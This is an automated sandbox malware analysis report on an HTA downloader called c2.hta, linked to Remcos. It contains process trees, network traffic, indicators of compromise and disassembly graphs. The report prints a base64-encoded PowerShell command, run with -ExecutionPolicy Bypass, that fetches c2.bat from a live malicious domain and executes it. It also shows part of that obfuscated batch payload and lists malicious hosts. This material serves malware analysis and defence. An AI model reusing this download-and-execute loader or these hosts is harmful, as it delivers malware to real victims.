                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:8
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:c2.hta
                                Detection:MAL
                                Classification:mal68.evad.winHTA@4/3@1/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 7
                                • Number of non-executed functions: 8
                                Cookbook Comments:
                                • Found application associated with file extension: .hta

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 13.107.246.45
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                09:36:13API Interceptor1x Sleep call for process: mshta.exe modified
                                09:36:14API Interceptor14x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                193.26.115.39c.htaGet hashmaliciousRemcosBrowse
                                  c1.htaGet hashmaliciousUnknownBrowse
                                    c2.htaGet hashmaliciousRemcosBrowse
                                      c2.htaGet hashmaliciousRemcosBrowse
                                        c2.htaGet hashmaliciousRemcosBrowse
                                          c2.htaGet hashmaliciousRemcosBrowse
                                            RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                              c2.htaGet hashmaliciousRemcosBrowse
                                                9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                                                  c2.htaGet hashmaliciousRemcosBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    candwfarmsllc.comc1.htaGet hashmaliciousUnknownBrowse
                                                    • 193.26.115.39
                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                    • 193.26.115.39
                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                    • 193.26.115.39
                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                    • 193.26.115.39

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    QUICKPACKETUSc.htaGet hashmaliciousRemcosBrowse
                                                    • 193.26.115.39
                                                    c1.htaGet hashmaliciousUnknownBrowse
                                                    • 193.26.115.39
                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                    • 193.26.115.39
                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                    • 193.26.115.39
                                                    RFQ-20241230.pif.exeGet hashmaliciousRemcosBrowse
                                                    • 173.211.106.233
                                                    Suppliers_Data.pif.exeGet hashmaliciousRemcosBrowse
                                                    • 173.211.106.233
                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                    • 193.26.115.39
                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                    • 193.26.115.39
                                                    RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                                    • 193.26.115.39
                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                    • 193.26.115.39

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eE6wUHnV51P.exeGet hashmaliciousDCRatBrowse
                                                    • 193.26.115.39
                                                    resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                    • 193.26.115.39
                                                    c1.htaGet hashmaliciousUnknownBrowse
                                                    • 193.26.115.39
                                                    http://www.grhga.icu/Get hashmaliciousUnknownBrowse
                                                    • 193.26.115.39
                                                    http://keystonerelated.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                    • 193.26.115.39
                                                    https://telegrams-mc.org/Get hashmaliciousUnknownBrowse
                                                    • 193.26.115.39
                                                    http://metamaeskloegin.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                    • 193.26.115.39
                                                    http://www.www-support-com.info/fmicode/code.phpGet hashmaliciousUnknownBrowse
                                                    • 193.26.115.39
                                                    http://m.escritoresunidos.com/Get hashmaliciousUnknownBrowse
                                                    • 193.26.115.39
                                                    https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                    • 193.26.115.39

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1336
                                                    Entropy (8bit):5.415351548465897
                                                    Encrypted:false
                                                    SSDEEP:24:3xSWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NK3R8er8Hw/1TAn:oWSU4y4RQmFoUeWmfmZ9tK8NWR8ej/1Q
                                                    MD5:0649CF090C1FB666FA16D57DA3D07ACA
                                                    SHA1:A6BB533D587F5B9D82313DE3768E681AE8EF5E9B
                                                    SHA-256:67E20113262E61CFDE9B4286D61D8E62016FA1479FAC7795B69012DADCD21456
                                                    SHA-512:DE44C12F8BE50C06692E528019F5ABB0E4B0228E7A1D9A50EFC4505D727C09A56BDAF696DAE4A77FDAB79EB76C54DC18723239567BB084DB8223C5AC1779C6EE
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dtvkzjgt.nzq.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsz3rn25.k5e.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    Static File Info

                                                    General

                                                    File type:HTML document, ASCII text, with CRLF line terminators
                                                    Entropy (8bit):4.152153947297235
                                                    TrID:
                                                    • HyperText Markup Language (12001/1) 40.67%
                                                    • HyperText Markup Language (11501/1) 38.98%
                                                    • HyperText Markup Language (6006/1) 20.35%
                                                    File name:c2.hta
                                                    File size:3'459 bytes
                                                    MD5:18f2197e51378d2fc3f6d250aca9a459
                                                    SHA1:b58941e542d1c4ec72c3ca925794e1de9c5d0338
                                                    SHA256:525d22cf62c199246896579367e361fae0dc4e80ad76076965546f7647a9c491
                                                    SHA512:686f4083069ef4491846befd53b411ec4c0f7ce7756d0f20ccb716f75ad7d6c9a380622437865f7a57c992b6b574c0f622bcb7ac2a2fb3a0acbd6cb6b38fc7af
                                                    SSDEEP:48:GOhhqnDjVJ9EAJtQWFUR/CZNOiPiZvJklJNA/kjw2Z4DhEHP//w/CO:GkqnDjVJ9DJpZ0aiZvqQk02Z4m//S
                                                    TLSH:79619522E9AEBD94473973300809699AE387171353615B08FCDF240FEF78610E34AA9C
                                                    File Content Preview:<html>..<head>.. <title></title>.. <HTA:APPLICATION.. ID="app".. APPLICATIONNAME="Downloader".. WINDOWSTATE="minimize".. BORDER="thin".. SCROLL="no".. SINGLEINSTANCE="yes".. SHOWINTASKBAR="no"..

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2025-01-12T15:36:16.173975+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449732193.26.115.39443TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 12, 2025 15:36:15.489094019 CET49732443192.168.2.4193.26.115.39
                                                    Jan 12, 2025 15:36:15.489130974 CET44349732193.26.115.39192.168.2.4
                                                    Jan 12, 2025 15:36:15.489212036 CET49732443192.168.2.4193.26.115.39
                                                    Jan 12, 2025 15:36:15.495939970 CET49732443192.168.2.4193.26.115.39
                                                    Jan 12, 2025 15:36:15.495959997 CET44349732193.26.115.39192.168.2.4
                                                    Jan 12, 2025 15:36:16.024626017 CET44349732193.26.115.39192.168.2.4
                                                    Jan 12, 2025 15:36:16.024760008 CET49732443192.168.2.4193.26.115.39
                                                    Jan 12, 2025 15:36:16.029479027 CET49732443192.168.2.4193.26.115.39
                                                    Jan 12, 2025 15:36:16.029486895 CET44349732193.26.115.39192.168.2.4
                                                    Jan 12, 2025 15:36:16.029783964 CET44349732193.26.115.39192.168.2.4
                                                    Jan 12, 2025 15:36:16.050846100 CET49732443192.168.2.4193.26.115.39
                                                    Jan 12, 2025 15:36:16.091336966 CET44349732193.26.115.39192.168.2.4
                                                    Jan 12, 2025 15:36:16.174067020 CET44349732193.26.115.39192.168.2.4
                                                    Jan 12, 2025 15:36:16.174118042 CET44349732193.26.115.39192.168.2.4
                                                    Jan 12, 2025 15:36:16.174211979 CET49732443192.168.2.4193.26.115.39
                                                    Jan 12, 2025 15:36:16.174221992 CET44349732193.26.115.39192.168.2.4
                                                    Jan 12, 2025 15:36:16.174253941 CET44349732193.26.115.39192.168.2.4
                                                    Jan 12, 2025 15:36:16.174273968 CET49732443192.168.2.4193.26.115.39
                                                    Jan 12, 2025 15:36:16.174304008 CET49732443192.168.2.4193.26.115.39
                                                    Jan 12, 2025 15:36:16.182676077 CET49732443192.168.2.4193.26.115.39

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 12, 2025 15:36:15.448225021 CET6541453192.168.2.41.1.1.1
                                                    Jan 12, 2025 15:36:15.483144999 CET53654141.1.1.1192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jan 12, 2025 15:36:15.448225021 CET192.168.2.41.1.1.10xc2dcStandard query (0)candwfarmsllc.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jan 12, 2025 15:36:15.483144999 CET1.1.1.1192.168.2.40xc2dcNo error (0)candwfarmsllc.com193.26.115.39A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • candwfarmsllc.com

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449732193.26.115.394435064C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-12 14:36:16 UTC168OUTGET /c2.bat HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                    Host: candwfarmsllc.com
                                                    Connection: Keep-Alive
                                                    2025-01-12 14:36:16 UTC288INHTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 14:36:16 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                    Last-Modified: Tue, 07 Jan 2025 14:48:52 GMT
                                                    ETag: "e32-62b1ed7f84eca"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 3634
                                                    Connection: close
                                                    Content-Type: application/x-msdownload
                                                    2025-01-12 14:36:16 UTC3634INData Raw: 40 25 56 4c 75 78 44 78 42 4d 25 65 25 7a 6b 6e 68 74 72 74 69 25 63 25 71 58 49 65 25 68 25 44 69 6f 55 70 72 62 25 6f 25 6e 46 25 20 25 58 53 7a 70 4a 75 4a 25 6f 25 5a 25 66 25 64 4c 25 66 25 65 45 4d 42 25 0d 0a 73 65 74 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 6d 73 77 6f 72 64 2e 7a 69 70 0d 0a 73 25 4f 66 52 5a 68 25 65 25 62 7a 68 6b 72 75 53 59 25 74 25 44 6b 75 74 4b 64 25 20 25 64 78 44 48 25 75 25 4b 7a 47 25 72 25 4b 47 75 57 67 70 42 6d 4d 6f 25 6c 25 61 64 71 50 68 42 77 52 25 3d 25 59 4e 4d 6a 6d 25 68 25 72 74 52 4c 74 50 4a 65 52 25 74 25 44 53 66 57 7a 53 25 74 25 79 59 79 25 70 25 41 42 54 4d 57 58 75 41 73 25 73 25 6d 25 3a 25 4d 49 25 2f 25 53 6e 42 6c 25 2f 25 74 74 6d 25 6d 25 67 76 74 25 79 25
                                                    Data Ascii: @%VLuxDxBM%e%zknhtrti%c%qXIe%h%DioUprb%o%nF% %XSzpJuJ%o%Z%f%dL%f%eEMB%set url=https://myguyapp.com/msword.zips%OfRZh%e%bzhkruSY%t%DkutKd% %dxDH%u%KzG%r%KGuWgpBmMo%l%adqPhBwR%=%YNMjm%h%rtRLtPJeR%t%DSfWzS%t%yYy%p%ABTMWXuAs%s%m%:%MI%/%SnBl%/%ttm%m%gvt%y%


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:09:36:13
                                                    Start date:12/01/2025
                                                    Path:C:\Windows\SysWOW64\mshta.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:mshta.exe "C:\Users\user\Desktop\c2.hta"
                                                    Imagebase:0x700000
                                                    File size:13'312 bytes
                                                    MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:09:36:13
                                                    Start date:12/01/2025
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA
                                                    Imagebase:0x9c0000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:09:36:13
                                                    Start date:12/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:2.5%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:26.3%
                                                      Total number of Nodes:19
                                                      Total number of Limit Nodes:0
                                                      execution_graph 12683 47aa4f8 12684 47aa518 12683->12684 12685 47aa60e 12684->12685 12687 47aaef6 12684->12687 12688 47aaf09 12687->12688 12691 47aaf01 12687->12691 12688->12691 12692 47aaf28 12688->12692 12696 47aaf18 12688->12696 12691->12685 12694 47aaf52 12692->12694 12700 47aa3ec 12694->12700 12698 47aaf28 12696->12698 12697 47aa3ec CreateProcessW 12699 47ab4fe 12697->12699 12698->12697 12699->12699 12701 47ab9f8 CreateProcessW 12700->12701 12703 47abca7 12701->12703 12704 47aa480 12706 47aa4af 12704->12706 12705 47aa60e 12706->12705 12707 47aaef6 CreateProcessW 12706->12707 12707->12705

                                                      Executed Functions

                                                      Function 047AAF28 Relevance: 4.2, Strings: 3, Instructions: 481COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 173 47aaf28-47aaf83 178 47aaf8d 173->178 179 47aaf85-47aaf8b 173->179 180 47aaf90-47aaf94 178->180 179->180 181 47aaf9e 180->181 182 47aaf96-47aaf9c 180->182 183 47aafa1-47aafae 181->183 182->183 185 47aaffc-47ab03c call 47aa3d4 183->185 186 47aafb0-47aaffa 183->186 194 47ab044-47ab048 185->194 186->194 196 47ab04a-47ab094 194->196 197 47ab096-47ab0d6 call 47aa3d4 194->197 206 47ab0de-47ab0e2 196->206 197->206 208 47ab130-47ab179 call 47aa3d4 206->208 209 47ab0e4-47ab12e 206->209 218 47ab181-47ab191 208->218 209->218 220 47ab19a-47ab1a8 218->220 221 47ab193-47ab198 218->221 223 47ab1cf-47ab1e4 220->223 224 47ab1aa 220->224 221->223 230 47ab1ea-47ab200 223->230 231 47ab267-47ab26b 223->231 225 47ab1c9 224->225 226 47ab1b9-47ab1bf 224->226 227 47ab1b1-47ab1b7 224->227 228 47ab1c1-47ab1c7 224->228 225->223 226->223 227->223 228->223 230->231 234 47ab202-47ab210 230->234 232 47ab49a-47ab4ce 231->232 233 47ab271-47ab27a 231->233 257 47ab4d8 232->257 258 47ab4d0-47ab4d6 232->258 235 47ab27c 233->235 236 47ab283-47ab28c 233->236 241 47ab212-47ab219 234->241 242 47ab220-47ab264 234->242 235->236 237 47ab29a-47ab2a5 236->237 238 47ab28e-47ab298 236->238 246 47ab2a7-47ab2ae 237->246 238->246 241->242 242->231 249 47ab2b8 246->249 250 47ab2b0-47ab2b6 246->250 252 47ab2bb-47ab2bf 249->252 250->252 253 47ab2cf-47ab2d2 252->253 254 47ab2c1-47ab2cd 252->254 256 47ab2d8-47ab2dc 253->256 254->256 261 47ab2de-47ab2e4 256->261 262 47ab2e6 256->262 260 47ab4db-47ab500 call 47aa3ec 257->260 258->260 268 47ab59e-47ab5f6 call 47aa3f8 260->268 269 47ab506-47ab52a 260->269 265 47ab2e9-47ab30a call 47aa3e0 261->265 262->265 271 47ab46c-47ab48d 265->271 272 47ab310-47ab322 265->272 301 47ab5f8 268->301 302 47ab600-47ab624 268->302 329 47ab52d call 47abdc8 269->329 330 47ab52d call 47abdb8 269->330 283 47ab48f 271->283 284 47ab497 271->284 281 47ab33b-47ab341 272->281 282 47ab324-47ab336 272->282 285 47ab343-47ab3b3 281->285 286 47ab3b5-47ab412 281->286 295 47ab414-47ab419 282->295 283->284 284->232 285->295 286->295 299 47ab41b-47ab463 295->299 300 47ab465 295->300 299->300 300->271 301->302 318 47ab625 302->318 303 47ab533-47ab597 303->268 318->318 329->303 330->303
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724999516.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_47a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4L^q$4L^q$4L^q
                                                      • API String ID: 0-1735365799
                                                      • Opcode ID: 1645a05be7df280b59c659d41662e607db7e6b0c7678bb817e33c185222e18ef
                                                      • Instruction ID: 375e366dde0c1e7a121b309be570cb069714cccfa532cd32c9b19cae397412df
                                                      • Opcode Fuzzy Hash: 1645a05be7df280b59c659d41662e607db7e6b0c7678bb817e33c185222e18ef
                                                      • Instruction Fuzzy Hash: F5127C70A002088FDB18DFA5C494BADBBF2FF88304F148569E50A9B3A5DB75AC55CF91
                                                      Function 047AB9ED Relevance: 1.8, APIs: 1, Instructions: 285COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 744 47ab9ed-47aba78 747 47aba7a-47aba80 744->747 748 47aba83-47aba8c 744->748 747->748 749 47abaf9-47abafd 748->749 750 47aba8e-47ababb 748->750 751 47abb28-47abb38 749->751 752 47abaff-47abb22 749->752 756 47abaeb 750->756 757 47ababd-47ababf 750->757 754 47abb3a-47abb56 751->754 755 47abb57-47abb5b 751->755 752->751 754->755 758 47abb7c-47abb8a 755->758 759 47abb5d-47abb74 755->759 768 47abaf0-47abaf3 756->768 761 47abae1-47abae9 757->761 762 47abac1-47abacb 757->762 763 47abba9-47abbad 758->763 764 47abb8c-47abba8 758->764 759->758 761->768 766 47abacf-47abadd 762->766 767 47abacd 762->767 769 47abbaf-47abbc5 763->769 770 47abbcd-47abbe6 763->770 764->763 766->766 771 47abadf 766->771 767->766 768->749 769->770 772 47abbe8-47abbf1 770->772 773 47abbf4-47abbfd 770->773 771->761 772->773 774 47abc18-47abc1c 773->774 775 47abbff-47abc16 773->775 776 47abc1e-47abc2f 774->776 777 47abc37-47abc4b 774->777 775->774 776->777 778 47abc4d 777->778 779 47abc50-47abca5 CreateProcessW 777->779 778->779 780 47abcae-47abccb 779->780 781 47abca7-47abcad 779->781 784 47abccd-47abcd9 780->784 785 47abce1-47abd0b 780->785 781->780 784->785 787 47abd1b-47abd1f 785->787 788 47abd0d-47abd11 785->788 791 47abd21-47abd25 787->791 792 47abd34-47abd38 787->792 788->787 790 47abd13-47abd16 call 47a04ec 788->790 790->787 791->792 794 47abd27-47abd2a 791->794 795 47abd3a-47abd3e 792->795 796 47abd4d-47abd51 792->796 794->792 795->796 797 47abd40-47abd43 795->797 798 47abd53-47abd57 796->798 799 47abd66-47abd6a 796->799 797->796 798->799 802 47abd59-47abd5c 798->802 800 47abd7b 799->800 801 47abd6c-47abd78 799->801 804 47abd7c 800->804 801->800 802->799 804->804
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724999516.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_47a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d18c6b6501329056639af41538b84521645bcdec24a4ae607b594b3a8770ab7a
                                                      • Instruction ID: 235ffdcf0895bfd7d3655b6f5481c33bd1bffce0bd4b3525a3f7dee0a7d40c43
                                                      • Opcode Fuzzy Hash: d18c6b6501329056639af41538b84521645bcdec24a4ae607b594b3a8770ab7a
                                                      • Instruction Fuzzy Hash: C7C11571D00219DFDB24CFA9C884B9DBBB2BF88314F25822AE505A7351DB74A995CF81
                                                      Function 047AA3EC Relevance: 1.8, APIs: 1, Instructions: 284processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 805 47aa3ec-47aba78 808 47aba7a-47aba80 805->808 809 47aba83-47aba8c 805->809 808->809 810 47abaf9-47abafd 809->810 811 47aba8e-47ababb 809->811 812 47abb28-47abb38 810->812 813 47abaff-47abb22 810->813 817 47abaeb 811->817 818 47ababd-47ababf 811->818 815 47abb3a-47abb56 812->815 816 47abb57-47abb5b 812->816 813->812 815->816 819 47abb7c-47abb8a 816->819 820 47abb5d-47abb74 816->820 829 47abaf0-47abaf3 817->829 822 47abae1-47abae9 818->822 823 47abac1-47abacb 818->823 824 47abba9-47abbad 819->824 825 47abb8c-47abba8 819->825 820->819 822->829 827 47abacf-47abadd 823->827 828 47abacd 823->828 830 47abbaf-47abbc5 824->830 831 47abbcd-47abbe6 824->831 825->824 827->827 832 47abadf 827->832 828->827 829->810 830->831 833 47abbe8-47abbf1 831->833 834 47abbf4-47abbfd 831->834 832->822 833->834 835 47abc18-47abc1c 834->835 836 47abbff-47abc16 834->836 837 47abc1e-47abc2f 835->837 838 47abc37-47abc4b 835->838 836->835 837->838 839 47abc4d 838->839 840 47abc50-47abca5 CreateProcessW 838->840 839->840 841 47abcae-47abccb 840->841 842 47abca7-47abcad 840->842 845 47abccd-47abcd9 841->845 846 47abce1-47abd0b 841->846 842->841 845->846 848 47abd1b-47abd1f 846->848 849 47abd0d-47abd11 846->849 852 47abd21-47abd25 848->852 853 47abd34-47abd38 848->853 849->848 851 47abd13-47abd16 call 47a04ec 849->851 851->848 852->853 855 47abd27-47abd2a 852->855 856 47abd3a-47abd3e 853->856 857 47abd4d-47abd51 853->857 855->853 856->857 858 47abd40-47abd43 856->858 859 47abd53-47abd57 857->859 860 47abd66-47abd6a 857->860 858->857 859->860 863 47abd59-47abd5c 859->863 861 47abd7b 860->861 862 47abd6c-47abd78 860->862 865 47abd7c 861->865 862->861 863->860 865->865
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000004), ref: 047ABC95
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724999516.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_47a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
